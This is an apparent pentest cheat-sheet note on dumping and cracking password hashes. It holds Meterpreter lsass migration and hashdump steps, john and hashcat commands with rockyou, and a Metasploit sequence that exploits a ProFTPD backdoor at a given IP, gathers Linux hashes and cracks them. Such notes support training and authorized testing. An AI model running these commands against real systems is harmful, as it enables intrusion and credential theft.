Dumping and Cracking Hashes
Dumping and Cracking Hashes
Navigation
Sections in This Note
Practical Checklist
- Confirm scope and authorization.
- Record exact commands and outputs.
- Convert findings into the next enumeration or validation step.
- Prefer evidence-based decisions over guessing.
Related
Migrated from Unsorted Notes — LINUX
LINUX
Linux is a free and open source operating system comprised of the Linux kernel (developed by Linus Torvalds) and the GNU toolkit (started/developed by Richard Stallman). This combination is commonly referred to as GNU/Linux. Linux is typically deployed as a server operating system, and specific services/protocols are commonly found running on Linux servers, providing attackers with access vectors.
Migrated from Unsorted Notes — Windows
Windows
pgrep lsass
migrate 708
hashdump
# save the hash to a file
john --format=NT hashes.txt
# or
hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
Migrated from Unsorted Notes — Linux
Linux
msfconsole -q
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 192.229.31.3
exploit
use post/linux/gather/hashdump
set SESSION 1
exploit
use auxiliary/analyze/crack_linux
set SHA512 true
run